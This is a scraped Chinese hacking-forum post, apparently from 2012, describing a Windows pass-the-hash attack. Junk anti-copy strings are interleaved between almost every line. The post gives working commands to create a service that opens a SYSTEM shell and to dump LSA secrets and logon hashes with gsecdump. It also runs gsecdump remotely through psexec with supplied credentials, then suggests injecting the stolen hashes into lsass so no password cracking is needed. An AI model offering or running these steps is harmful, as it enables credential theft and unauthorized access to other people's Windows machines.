中国网络渗透测试联盟
标题:
HASH注入式攻击
[打印本页]
作者:
admin
时间:
2012-11-6 21:09
标题:
HASH注入式攻击
o get a DOS Prompt as NT system:
* J0 k7 h T5 @2 d! N- S, v3 {
$ x% F# z5 C, t' r# Z8 f# a
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
4 j& t P- }2 b
[SC] CreateService SUCCESS
7 e9 B0 T' c6 N; j! S" d
* b0 O6 _ A& j5 X4 J7 c' E
C:\>sc start shellcmdline
" y- q5 E6 X0 |
[SC] StartService FAILED 1053:
P& e+ G+ H. F! W
/ ?3 n6 N" v1 v& H" h
The service did not respond to the start or control request in a timely fashion.
2 e6 {' d$ W6 I* X, \* Y H4 _
+ \" N6 J$ @7 M$ k7 I) x
C:\>sc delete shellcmdline
2 n% _0 |+ y7 L! n
[SC] DeleteService SUCCESS
1 c0 X. R- J4 a+ H
0 w) k' {9 M$ N7 |" Y; Y) p6 u
------------
5 `& y: S, J, P4 b; C/ J
+ a3 F/ {, }- C
Then in the new DOS window:
3 v2 w8 p) V b, t- x0 |, D7 G
" @' ?+ |% ^5 @6 O
Microsoft Windows XP [Version 5.1.2600]
+ C. y4 ?) X, O7 }' ~! L
(C) Copyright 1985-2001 Microsoft Corp.
" K1 ~7 C+ Y; I! w9 R$ ?# z
5 M: |* N4 D; X: A' J( y
C:\WINDOWS\system32>whoami
' @6 T% ~* Z6 k' T W: W7 e
NT AUTHORITY\SYSTEM
* V$ C/ e8 @6 o& g0 O
: ]# H7 H4 R5 V" {+ s+ B
C:\WINDOWS\system32>gsecdump -h
+ e1 y2 c) u O" W* R
gsecdump v0.6 by Johannes Gumbel (
链接标记
johannes.gumbel@truesec.se
)
, @/ g' u, L8 m( p9 \! M5 r
usage: gsecdump [options]
( M5 l3 M- R& T$ M$ j
# J7 o, a2 _+ e6 ~ G
options:
0 a/ t. @7 `0 a2 \
-h [ --help ] show help
+ @2 K/ j# G; v+ C2 d, O
-a [ --dump_all ] dump all secrets
: W. G2 i/ t9 {0 z
-l [ --dump_lsa ] dump lsa secrets
; y ~$ H* E6 L5 X6 x
-w [ --dump_wireless ] dump microsoft wireless connections
/ Y1 V: J) e: @8 ^
-u [ --dump_usedhashes ] dump hashes from active logon sessions
) T, z0 f" k# n: v- k! z# p1 U
-s [ --dump_hashes ] dump hashes from SAM/AD
- t6 `' Z7 {; O3 ]% ~- R: w
]0 _! x0 m* u# R& d
Although I like to use:
2 u7 [$ w. F5 e6 {: L
. C/ Y" D: W. x* G, X
PsExec v1.83 - Execute processes remotely
- v# e; O ^( T
Copyright (C) 2001-2007 Mark Russinovich
5 ?% z8 V8 N4 O: d
Sysinternals -
链接标记[url]www.sysinternals.com
[/url]
0 P2 M* k7 D6 c( L* y
! h" Q: q7 j, W+ B) d3 }; ]
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
8 t! n. z3 T+ L5 w4 y+ C0 g8 u: s
( X: C" e' q4 t% b) @* z2 B
to get the hashes from active logon sessions of a remote system.
5 w8 [5 }. g$ p- i. V- N
6 X# l; I( c6 ?" D" P9 k" F& E
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
4 ^) _6 l, Z% X; q6 m; y
* _9 x4 g5 N- S6 x* w7 u1 \
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
% }9 ]' X% G/ J7 ^# H4 p/ D
原文出处:
链接标记[url]http://truesecurity.se/blogs/mur
... -text-password.aspx[/url]
' \7 c. z) S: W2 V3 j
/ ^# x1 A: g6 D- E1 J
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
" a& z1 l7 k# M
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2